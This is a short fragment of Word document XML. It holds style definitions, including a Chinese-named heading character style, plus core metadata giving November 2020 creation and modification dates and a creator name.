    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="8">
    <w:name w:val="标题 2 Char"/>
    <w:basedOn w:val="7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2020-11-07T11:34:00Z</dcterms:created>
  <dc:creator>ttn91</dc:creator>
  <cp:lastModifiedBy>ttn91</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-11-08T07:02:56Z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